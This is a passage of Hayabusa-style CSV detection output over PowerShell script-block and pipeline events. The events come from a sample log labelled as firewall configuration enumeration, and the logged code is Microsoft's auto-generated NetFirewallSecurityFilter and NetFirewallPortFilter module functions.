Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallPortFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 